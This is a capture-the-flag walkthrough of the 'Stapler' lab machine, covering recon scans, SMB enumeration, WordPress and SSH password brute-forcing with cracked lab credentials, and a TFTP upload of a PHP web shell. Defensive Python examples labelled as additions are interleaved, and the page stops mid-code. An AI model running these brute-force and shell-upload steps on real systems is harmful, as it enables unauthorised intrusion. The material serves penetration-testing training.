Stapler: 1

This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:
Name: Stapler
IP: DHCP
Date: 2016-June-08
Goal: Get Root!
Author: g0tmi1k
Difficultly: ??? ;)

+ Average beginner/intermediate VM, only a few twists
+ May find it easy/hard (depends on YOUR background)
+ ...also which way you attack the box

+ It SHOULD work on both VMware and Virtualbox
+ REBOOT the VM if you CHANGE network modes
+ Fusion users, you'll need to retry when importing

+ There are multiple methods to-do this machine
+ At least two (2) paths to get a limited shell
+ At least three (3) ways to get a root access

+ Made for BsidesLondon 2016
+ Slides: https://download.vulnhub.com/media/stapler/

+ Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman
+ ...and shout-outs to the VulnHub-CTF Team =)

--[[~~Enjoy. Have fun. Happy Hacking.~~]]--
Let’s start…..
Recon
What ports are open and what services are running?
root@redteam:~# nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-29 20:08 CEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Nmap scan report for stapler (192.168.50.136)
Host is up (0.00040s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.50.135
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid:
|   id.server: AMS
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: g\\x0B\x16M\x1C%\x1F(5\x11 DZ\x01?\x1Eq\x7FI
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:BD:3B:EA (VMware)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 34m37s, median: 1h59m58s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2019-05-29T21:09:48+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-05-29 22:09:48
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.64 seconds
           Raw packets sent: 131126 (5.770MB) | Rcvd: 80 (3.372KB)
That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also 2 webservers, a samba server and a MySQL server running.
Finally there is also something returning output on port 666.
If you can't remember which service a port is normally assigned to, you can look it up in /etc/services on Linux.
As an example, I’m going to check out port 3306.
root@redteam:~# cat /etc/services | grep 3306
mysql           3306/tcp
mysql           3306/udp
FTP
Anonymous login is enabled, so let's see what is inside.
root@redteam:~# ftp
ftp> open red
Connected to red.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (red:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Collected a possible username: harry
But what banner?
root@redteam:~# ssh 192.168.50.136
The authenticity of host '192.168.50.136 (192.168.50.136)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.136' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here          ~
-----------------------------------------------------------------
No password yet, so moving on.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 04  2016 .
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ..
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 Switching to Binary mode.
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (105.9758 kB/s)

root@redteam:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Two more possible usernames: elly and john.
I put the usernames into a list for later use.
root@redteam:~# echo -e "harry\nelly\njohn" > usernames.txt
Port 666
Connecting to port 666 returns unreadable output, which I redirect into a file.

root@redteam:~# nc -v red 666 | tee -a output
root@redteam:~# file output
output: Zip archive data, at least v2.0 to extract
A zip file.
root@redteam:~# unzip output
Archive:  output
  inflating: message2.jpg
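The `file` check above works because it recognises the archive by its leading bytes (ZIP local file headers start with `PK\x03\x04`), and `unzip` then trusts whatever member names the archive carries. As an added example (my code, not part of the original post), the following Python does the same identification from a magic-byte table and lists an archive's members without extracting, flagging names that would escape the extraction directory. The archive it builds is a constructed stand-in for the bytes served on port 666, holding a minimal JPEG header under the name `message2.jpg` plus one deliberately bad member name; the signature table is a small subset of what `file` knows.

```python
import io
import zipfile
from typing import Dict, List

# Magic-byte table for a few common formats. Constructed for this example; it is
# a tiny subset of the signatures the `file` command ships with.
SIGNATURES = {
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\x1f\x8b": "gzip",
    b"\x7fELF": "elf",
}


def identify(data: bytes) -> str:
    """Return a format name based on the leading bytes, or 'unknown'."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def is_unsafe_member(name: str) -> bool:
    """True if extracting this member name could write outside the target directory."""
    normalized = name.replace("\\", "/")
    return normalized.startswith("/") or ".." in normalized.split("/")


def inspect_zip(data: bytes) -> List[Dict[str, object]]:
    """List archive members without writing anything to disk.

    Each entry records the member name, its uncompressed size, whether the name
    is a path-traversal attempt, and (for safe members) the format of its content.
    """
    entries: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            unsafe = is_unsafe_member(info.filename)
            entries.append({
                "name": info.filename,
                "size": info.file_size,
                "unsafe": unsafe,
                # Member content is only read into memory, never extracted.
                "type": "skipped" if unsafe else identify(zf.read(info)),
            })
    return entries


def build_sample() -> bytes:
    """Constructed stand-in for the port-666 blob (not the real archive): a zip with a
    minimal JPEG header named message2.jpg plus a traversal member name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message2.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32)
        zf.writestr("../outside.txt", b"must never land outside the extraction dir\n")
    return buf.getvalue()


if __name__ == "__main__":
    blob = build_sample()
    print("container:", identify(blob))
    for entry in inspect_zip(blob):
        flag = "UNSAFE" if entry["unsafe"] else "ok"
        print(f"{flag:6} {entry['name']:16} {entry['size']:4d} bytes  {entry['type']}")
```

Running the block prints `container: zip`, an `ok` line for `message2.jpg` typed as `jpeg`, and an `UNSAFE` line for the traversal member. Listing before extracting is the habit worth keeping when the archive came from an unknown service.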
Another possible username. The message about segmentation fault could suggest a buffer overflow.
root@redteam:~# exiftool message2.jpg
ExifTool Version Number         : 11.16
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 17:03:07+02:00
File Access Date/Time           : 2019:05:29 20:54:52+02:00
File Inode Change Date/Time     : 2019:05:29 20:53:20+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028
It looks like there is some useful meta-data inside this picture. Getting a cookie? Ok.
Webservers
I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.
<title>Tim, we need to-do better next year for Initech</title>
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
More usernames for the file.
My directory brute force attempts came up empty. So maybe Nikto has better luck.
root@redteam:~# nikto -h http://192.168.50.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        80
+ Start Time:         2019-05-29 22:17:40 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-05-29 22:18:00 (GMT2) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@redteam:~# nikto -h 192.168.50.136:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2019-05-29 22:17:55 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.50.136' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2019-05-29 22:20:59 (GMT2) (184 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
These scans look promising. The first one found a file that resides in a user's home folder, so there may be LFI possibilities.
The second scan shows the existence of a robots.txt file, which has 2 entries. Also, there is a phpmyadmin page and there is an SSL certificate with some useful information.
It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.
/blogblog/ takes me to a WordPress site, and I navigate to the wp-admin page.
So there is a john user, but the password is just not correct. Time for wpscan.
When using wpscan here it's important to pass the --disable-tls-checks option: without it the scan aborts because of the certificate.
The scan says the current WordPress runs on version 4.2.1. And this version has some vulnerabilities.
I also got some valid credentials. So that was something I wanted to investigate first, as it’s relatively easy.
[i] User(s) Identified:

[+] john
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - john / incorrect
All Found
Progress Time: 00:05:32 <==========                        > (155 / 1999)  7.75%  ETA: ??:??:??

[i] Valid Combinations Found:
[SUCCESS] - garry / football
[SUCCESS] - harry / monkey
[SUCCESS] - scott / cookie
[SUCCESS] - tim / thumb
[SUCCESS] - kathy / coolgirl
[SUCCESS] - john / incorrect
For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights. So I try Tim next.
Tim has the same rights, and so does Kathy. They can't do anything without it first being approved by the admin, and it looks like that is John.
There are several ways to get a reverse shell from WordPress, but in this case it wasn't that simple. What I tried:
- altering the 404 page by replacing the php code with the code from pentestmonkey. This didn’t work because the files weren’t writable.
- installing a plugin. This also did not work, because I needed to give the FTP credentials.
After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.
SMB
Because connecting to the MySQL server needs a password I go for the SMB server.
root@redteam:~# smbclient -L 192.168.50.136
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            RED

root@redteam:~/tmp/backup# smbmap -H 192.168.50.136 -P 139
[+] Finding open SMB ports....
[+] Guest RPC session established on 192.168.50.136...
[+] IP: 192.168.50.136:139     Name: red
        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        kathy                                                   READ ONLY
        tmp                                                     READ, WRITE
        IPC$                                                    NO ACCESS
Another option Kali has for enumerating an SMB server is a Perl script named enum4linux. This script has many options, but for now I'm going to enumerate users via RID cycling.

S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
Now to filter out the usernames and store them in the usernames.txt file.
root@redteam:~# cat rid.list | cut -d '\' -f2 | awk '{print $1}' | tr [:upper:] [:lower:] >> usernames.txt
After checking the list, it seems that I have duplicates.
root@redteam:~# cat usernames.txt | sort -u > usernames.list
From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.
root@redteam:~# smbclient \\\\192.168.50.136\\kathy
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls -lah
NT_STATUS_NO_SUCH_FILE listing \-lah
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

                19478204 blocks of size 1024. 16396568 blocks available

From this share I get 3 files:

-rw-r--r-- 1 root root   64 May 29 21:29 todo-list.txt
-rw-r--r-- 1 root root 5.9K May 29 21:29 vsftpd.conf
-rw-r--r-- 1 root root 6.1M May 29 21:30 wordpress-4.tar.gz

root@redteam:~/tmp# cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy

listen=YES
listen_ipv6=NO
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
banner_file=/etc/vsftpd.banner
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
pasv_enable=no
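The vsftpd.conf from the share explains several things seen earlier: anonymous logins are on, TLS is off (which is why nmap reported a plaintext control connection), passive mode is off (the `PASV failed` line in the ftp-anon script), and local users are rooted at /etc. As an added example, not from the original post or from the vsftpd project, here is a small Python audit that parses the config as quoted above and reports those settings, plus a couple of checks (anonymous upload, missing chroot) that do not fire on this file. Absent keys are treated as NO, which is a simplification noted in the code: vsftpd's compiled-in default for anonymous_enable is YES, so a missing line deserves a manual look.

```python
from typing import Dict, List

# vsftpd.conf as recovered from the kathy share (the content quoted above).
VSFTPD_CONF = """\
listen=YES
listen_ipv6=NO
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
banner_file=/etc/vsftpd.banner
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
pasv_enable=no
"""

# Directories a local user's FTP root should never point at (constructed list).
SYSTEM_ROOTS = ("/", "/etc", "/root", "/usr", "/var")


def parse_vsftpd(text: str) -> Dict[str, str]:
    """Parse key=value lines; vsftpd ignores blank lines and '#' comments."""
    opts: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        opts[key.strip().lower()] = value.strip()
    return opts


def enabled(opts: Dict[str, str], key: str) -> bool:
    # vsftpd booleans are case-insensitive YES/NO (TRUE/FALSE and 1/0 also work).
    # An absent key is treated as NO here; vsftpd's compiled-in default for
    # anonymous_enable is actually YES, so flag missing lines for manual review.
    return opts.get(key, "NO").upper() in ("YES", "TRUE", "1")


def audit_vsftpd(opts: Dict[str, str]) -> List[Dict[str, str]]:
    """Return findings as {key, severity, message} dicts, in check order."""
    findings: List[Dict[str, str]] = []

    def add(key: str, severity: str, message: str) -> None:
        findings.append({"key": key, "severity": severity, "message": message})

    if enabled(opts, "anonymous_enable"):
        add("anonymous_enable", "high",
            f"anonymous logins allowed, rooted at {opts.get('anon_root', '<compiled default>')}")
        if enabled(opts, "write_enable") and (
                enabled(opts, "anon_upload_enable") or enabled(opts, "anon_mkdir_write_enable")):
            add("anon_upload_enable", "critical", "anonymous users can write to the server")

    if not enabled(opts, "ssl_enable"):
        add("ssl_enable", "medium", "TLS disabled: passwords and file contents travel in plaintext")

    if enabled(opts, "local_enable"):
        root = opts.get("local_root", "")
        if root and (root.rstrip("/") or "/") in SYSTEM_ROOTS:
            add("local_root", "high", f"local users are rooted at {root}, a system directory")
        if not enabled(opts, "chroot_local_user"):
            add("chroot_local_user", "medium", "local users are not confined to their FTP root")

    # pasv_enable defaults to YES; turning it off breaks clients behind NAT
    # (this is the PASV error nmap's ftp-anon script reported).
    if opts.get("pasv_enable", "YES").upper() in ("NO", "FALSE", "0"):
        add("pasv_enable", "info", "passive mode disabled: NAT'd clients cannot list or transfer")

    return findings


if __name__ == "__main__":
    for f in audit_vsftpd(parse_vsftpd(VSFTPD_CONF)):
        print(f"[{f['severity']:8}] {f['key']}: {f['message']}")
```

On the quoted file this yields four findings (anonymous_enable, ssl_enable, local_root, pasv_enable); a config with anonymous_enable=NO, ssl_enable=YES, chroot_local_user=YES and a local_root under /srv produces none.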
Now for the tmp share.
root@redteam:~/tmp/backup# smbclient \\\\192.168.50.136\\tmp
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May 29 23:39:18 2019
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  ls                                  N      274  Sun Jun  5 17:32:58 2016

                19478204 blocks of size 1024. 16396552 blocks available

root@redteam:~/tmp/backup# cat ls
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

An ASCII file with a listing of a filesystem. I can't really do anything with it from here.
UDP
Because FTP plays a role in this challenge, I decided to check a related angle: TFTP, which runs over UDP.

root@redteam:~# cat /etc/services | grep ftp
ftp-data        20/tcp
ftp             21/tcp
tftp            69/udp

root@redteam:~# nmap -n -T4 -sU -sV -sC -p 69 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-31 10:59 CEST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 192.168.50.136
Host is up (0.00024s latency).

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
MAC Address: 00:0C:29:BD:3B:EA (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.99 seconds
Nmap isn't sure (open|filtered), but we can try it anyway.

root@redteam:~/stapler# tftp 192.168.50.136
tftp> status
Connected to 192.168.50.136.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
Cool. Let’s see if we can upload a file.
tftp> verbose on
Verbose mode on.
tftp> mode
Using netascii mode to transfer files.
tftp> put shell.php
putting shell.php to 192.168.50.136:shell.php [netascii]
Sent 5688 bytes in 0.0 seconds [inf bits/sec]
Unfortunately the script wasn’t anywhere to be found.
SSH
I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.
root@redteam:~/stapler# hydra -L rid.list -P rid.list 192.168.50.136 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-31 11:38:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 841 login tries (l:29/p:29), ~53 tries per task
[DATA] attacking ssh://192.168.50.136:22/
[22][ssh] host: 192.168.50.136   login: SHayslett   password: SHayslett

And this is why I don't like brute forcing. Before I found these credentials I first tried several lists from SecLists and then the rockyou list.
When that didn't work I almost gave up on this option; only as a last attempt did I use the usernames gathered during this pentest as both the login and the password list, which was more luck than wisdom.
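The hydra run above is also the easiest thing on this box for a defender to catch: hundreds of failed SSH logins from one source inside a minute, followed by a success. As an added example (my code, not from the original post), the following Python parses sshd lines from a syslog-style auth.log, keeps a sliding window of failures per source address, and reports sources that exceed a threshold, marking the case that matters most: a successful login right after the burst. The log excerpt is constructed for this example, and the threshold (5 failures) and window (60 seconds) are my assumptions, not values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed /var/log/auth.log excerpt in syslog format. Modelled on what a
# single-source password-guessing run leaves behind; not taken from the box.
SAMPLE_AUTH_LOG = """\
May 31 11:38:42 red sshd[2101]: Failed password for invalid user RNunemaker from 192.168.50.135 port 50122 ssh2
May 31 11:38:43 red sshd[2103]: Failed password for invalid user ETollefson from 192.168.50.135 port 50124 ssh2
May 31 11:38:44 red sshd[2105]: Failed password for invalid user DSwanger from 192.168.50.135 port 50126 ssh2
May 31 11:38:46 red sshd[2108]: Failed password for AParnell from 192.168.50.135 port 50130 ssh2
May 31 11:38:48 red sshd[2112]: Failed password for invalid user MBassin from 192.168.50.135 port 50134 ssh2
May 31 11:38:50 red sshd[2120]: Failed password for SHayslett from 192.168.50.135 port 50160 ssh2
May 31 11:38:51 red sshd[2140]: Accepted password for SHayslett from 192.168.50.135 port 50190 ssh2
May 31 11:40:02 red sshd[2200]: Failed password for peter from 192.168.50.20 port 41002 ssh2
"""

# Matches OpenSSH's "Accepted/Failed password for [invalid user] <user> from <ip> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text: str) -> List[Dict[str, object]]:
    """Extract password-auth events. Syslog stamps carry no year, so ordering is
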